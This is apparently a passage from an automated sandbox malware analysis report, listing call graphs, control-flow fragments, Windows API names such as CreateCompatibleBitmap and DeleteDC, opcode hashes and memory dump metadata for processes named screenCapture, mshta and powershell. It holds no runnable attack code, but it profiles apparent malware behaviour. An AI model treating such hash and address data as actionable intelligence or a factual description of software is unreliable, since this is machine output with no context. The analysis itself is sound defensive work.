                                                                                                                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                                                                                                                      • Opcode ID: fa6c50d8748aad5d764c225e48168b8bc9b45e38ac2e11854ae7742a889cf8e4
                                                                                                                                                                                                                                      • Instruction ID: 4619f9ab2215db7ea426edec3819193f065214179bb00884c59b368136ef2b23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa6c50d8748aad5d764c225e48168b8bc9b45e38ac2e11854ae7742a889cf8e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1531943191CA189FDB18EF5CD8066B9B7E0FB69311F10422EE449D3651DB74B8558BC2

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:18.4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:6
                                                                                                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                                                      callgraph 0 Function_00007FFEC6D410A0 37 Function_00007FFEC6D40490 0->37 82 Function_00007FFEC6D404D8 0->82 1 Function_00007FFEC6D4029F 2 Function_00007FFEC6D40CA3 3 Function_00007FFEC6D401A2 4 Function_00007FFEC6D41228 45 Function_00007FFEC6D40498 4->45 5 Function_00007FFEC6D40A27 6 Function_00007FFEC6D4092D 7 Function_00007FFEC6D4012D 8 Function_00007FFEC6D4062A 9 Function_00007FFEC6D4072A 10 Function_00007FFEC6D4142A 11 Function_00007FFEC6D406AA 12 Function_00007FFEC6D405AA 13 Function_00007FFEC6D407AA 14 Function_00007FFEC6D4152F 15 Function_00007FFEC6D4112F 16 Function_00007FFEC6D40332 17 Function_00007FFEC6D401B2 18 Function_00007FFEC6D404B8 19 Function_00007FFEC6D400BD 20 Function_00007FFEC6D4133C 21 Function_00007FFEC6D4073A 22 Function_00007FFEC6D4063A 23 Function_00007FFEC6D406BA 24 Function_00007FFEC6D405BA 25 Function_00007FFEC6D40501 26 Function_00007FFEC6D4127E 27 Function_00007FFEC6D40102 28 Function_00007FFEC6D40202 29 Function_00007FFEC6D40682 30 Function_00007FFEC6D40A86 31 Function_00007FFEC6D4080A 32 Function_00007FFEC6D4070A 33 Function_00007FFEC6D4020A 34 Function_00007FFEC6D4060A 35 Function_00007FFEC6D4068A 36 Function_00007FFEC6D4058A 38 Function_00007FFEC6D4160F 39 Function_00007FFEC6D4038F 40 Function_00007FFEC6D4088F 41 Function_00007FFEC6D4128F 42 Function_00007FFEC6D40112 43 Function_00007FFEC6D40192 44 Function_00007FFEC6D40092 46 Function_00007FFEC6D4021D 47 Function_00007FFEC6D4031D 48 Function_00007FFEC6D4071A 49 Function_00007FFEC6D4061A 50 Function_00007FFEC6D4011A 51 Function_00007FFEC6D4081A 52 Function_00007FFEC6D4079A 53 Function_00007FFEC6D4069A 54 Function_00007FFEC6D4059A 55 Function_00007FFEC6D407E3 56 Function_00007FFEC6D401E2 57 Function_00007FFEC6D406E2 58 Function_00007FFEC6D40362 59 Function_00007FFEC6D40069 60 Function_00007FFEC6D404E8 61 Function_00007FFEC6D405EA 62 Function_00007FFEC6D406EA 63 Function_00007FFEC6D416EF 64 Function_00007FFEC6D4076F 65 Function_00007FFEC6D417F5 66 Function_00007FFEC6D401F2 67 Function_00007FFEC6D40372 68 Function_00007FFEC6D41076 69 Function_00007FFEC6D408FD 70 Function_00007FFEC6D406FA 71 Function_00007FFEC6D405FA 72 Function_00007FFEC6D4037A 73 Function_00007FFEC6D4057A 74 Function_00007FFEC6D401C2 75 Function_00007FFEC6D406CA 76 Function_00007FFEC6D405CA 77 Function_00007FFEC6D4054A 78 Function_00007FFEC6D41050 79 Function_00007FFEC6D40750 80 Function_00007FFEC6D401D2 81 Function_00007FFEC6D407D2 83 Function_00007FFEC6D40ADD 83->18 83->60 84 Function_00007FFEC6D4015B 85 Function_00007FFEC6D4025B 86 Function_00007FFEC6D405DA 87 Function_00007FFEC6D406DA 88 Function_00007FFEC6D4055A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.67925103106.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_7ffec6d40000_screenCapture_1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Delete
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1035893169-0
                                                                                                                                                                                                                                      • Opcode ID: fa3ec210dc0a78796b7b797da6bcafcc5634d2ca11ad59e76ea1ae796b7e26a3
                                                                                                                                                                                                                                      • Instruction ID: b1248e1e6489bc2bcf2b42a8b330cecf257bafbf44946143d03351a61eefed86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa3ec210dc0a78796b7b797da6bcafcc5634d2ca11ad59e76ea1ae796b7e26a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6831E03190CA4C9FDB59DFA8C849BF9BBE0FF56321F00426ED049C3592CB64A855CB52

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.67925103106.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_7ffec6d40000_screenCapture_1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BitmapCompatibleCreate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1901715728-0
                                                                                                                                                                                                                                      • Opcode ID: 97e659e75fd7622a5206ce92da2d3ce09725a04010789177749f2ab4ee3acaa9
                                                                                                                                                                                                                                      • Instruction ID: 5a39e7ae231195638be697bc2569fb1e9f5d1a005b50a053249b018486ba78f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97e659e75fd7622a5206ce92da2d3ce09725a04010789177749f2ab4ee3acaa9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F121867191CA0C8FDB1CEB98D8466F977E0EB59321F10412ED04ED3651DA616846CB55

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 14 7ffec6d4152f-7ffec6d415bf CreateCompatibleBitmap 17 7ffec6d415c1 14->17 18 7ffec6d415c7-7ffec6d415e4 14->18 17->18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.67925103106.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_7ffec6d40000_screenCapture_1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BitmapCompatibleCreate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1901715728-0
                                                                                                                                                                                                                                      • Opcode ID: 2dca0962437826bbe128a77d963f7527a6c9b43541cc74e040eab5d0007080a7
                                                                                                                                                                                                                                      • Instruction ID: 787f79bc19eca53541e066595c77ae20cd54284243dd5d0c69e28d9eac03d923
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dca0962437826bbe128a77d963f7527a6c9b43541cc74e040eab5d0007080a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D21953191CA4C8FDB1CEB98D8466F97BE1EB59321F00412ED04AD3651DB616856CB81

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 25 7ffec6d4072a-7ffec6d41865 28 7ffec6d4186d-7ffec6d418a2 DeleteDC 25->28 29 7ffec6d418a4 28->29 30 7ffec6d418aa-7ffec6d418d1 28->30 29->30
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.67925103106.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_7ffec6d40000_screenCapture_1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Delete
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1035893169-0
                                                                                                                                                                                                                                      • Opcode ID: b2d20abd2be42a9f9ba8a2971cc6c4dd86bd9581192439ec17db4c83ee925d31
                                                                                                                                                                                                                                      • Instruction ID: 6824ccc0a6389a5c90518de62dfc4dd639af41734b4ae6e7d6df9fb140428d91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2d20abd2be42a9f9ba8a2971cc6c4dd86bd9581192439ec17db4c83ee925d31
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E321A130A08A0C9FDB58DF98C845BF9BBE0FB65321F00422ED04ED3651DB71A856CB91

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 19 7ffec6d4071a-7ffec6d41865 22 7ffec6d4186d-7ffec6d418a2 DeleteDC 19->22 23 7ffec6d418a4 22->23 24 7ffec6d418aa-7ffec6d418d1 22->24 23->24
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.67925103106.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_7ffec6d40000_screenCapture_1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Delete
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1035893169-0
                                                                                                                                                                                                                                      • Opcode ID: b2d20abd2be42a9f9ba8a2971cc6c4dd86bd9581192439ec17db4c83ee925d31
                                                                                                                                                                                                                                      • Instruction ID: 6824ccc0a6389a5c90518de62dfc4dd639af41734b4ae6e7d6df9fb140428d91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2d20abd2be42a9f9ba8a2971cc6c4dd86bd9581192439ec17db4c83ee925d31
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E321A130A08A0C9FDB58DF98C845BF9BBE0FB65321F00422ED04ED3651DB71A856CB91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000026.00000003.67967215294.0000020C20810000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020C20810000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_38_3_20c20810000_mshta.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5ba2e1a521016d2c7164f7fe7f35988dec8f75605b5d913d5f5949e93377af2a
                                                                                                                                                                                                                                      • Instruction ID: 1d5f7ac81f2907dd9e8e64b9bd94256f1b2c2af789fc109cd7c816ccf82725bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ba2e1a521016d2c7164f7fe7f35988dec8f75605b5d913d5f5949e93377af2a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2B0120005F7C64ED71353720C6B15E6F705E47154FED0AC3C455E50D7D44C098B5362
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002C.00000002.68189310521.00007FFEC6E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6E10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_44_2_7ffec6e10000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 1
                                                                                                                                                                                                                                      • API String ID: 0-2212294583
                                                                                                                                                                                                                                      • Opcode ID: da7a60a599c6ce5463aca39b389974918872f27ba9a270c9481bff3c3cac2349
                                                                                                                                                                                                                                      • Instruction ID: e85bdd7c4586de1ebc4bf094a3b35f9e28dabb092632e44f33c07a35635e0b3b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da7a60a599c6ce5463aca39b389974918872f27ba9a270c9481bff3c3cac2349
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42D0EB73C0CAA50EEB12E2BC6C021D9B7D0DF21378B0402B3D02CD30C2D9280810C3C1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002C.00000002.68187965120.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_44_2_7ffec6d40000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4bdce29d83114db6a3793e0e2057ab75f87c4773273cdeb0a05035d795b69e11
                                                                                                                                                                                                                                      • Instruction ID: 704852ee1714600da7f817edf897c286746ba80ccd38f6eff720e854587f4bda
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdce29d83114db6a3793e0e2057ab75f87c4773273cdeb0a05035d795b69e11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8111C43051C648CFEF44EFA8D8853F87BE0EB65321F0440BAD44DC7162C765A856CB52
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002C.00000002.68187965120.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_44_2_7ffec6d40000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c86c51856a7b3ead61b0c989ffb2a5d57b08298839ecbb461d1916d9205cf94a
                                                                                                                                                                                                                                      • Instruction ID: 07b90860fbe9130bdce62bf35efddc6351940485edd7cdb9fd5d06e5199c6738
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c86c51856a7b3ead61b0c989ffb2a5d57b08298839ecbb461d1916d9205cf94a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20219270908A0C8FDF58EF98D84A7F97BE4EB69321F00416ED04ED3252DB74A856CB51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002C.00000002.68187965120.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_44_2_7ffec6d40000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ee9fc0f230b3da9e64d124d29b527868611513d65ea0a19d3b817ffb4fbb3e12
                                                                                                                                                                                                                                      • Instruction ID: eb0f676f8c0235e1c408b816f98e818babc0c980843158fea547baaf73267e76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee9fc0f230b3da9e64d124d29b527868611513d65ea0a19d3b817ffb4fbb3e12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87218E30A08A0C8FDF58EF98D88A7F97BE0EBA9321F00416ED049D3252DA71A855CB51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002C.00000002.68187965120.00007FFEC6D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_44_2_7ffec6d40000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: eb124607f93bb4b6f1bca25a60d8853f146e873715ab7dbe9a47686a240a3978
                                                                                                                                                                                                                                      • Instruction ID: b342a4e78d2bf65e77360d06861444ca628aa4c538d1d4bb0d1d8650c9e0170f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb124607f93bb4b6f1bca25a60d8853f146e873715ab7dbe9a47686a240a3978
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2801677111CB0C4FDB44EF0CE451AB6B7E0FB95324F50056DE58AC3661D636E892CB46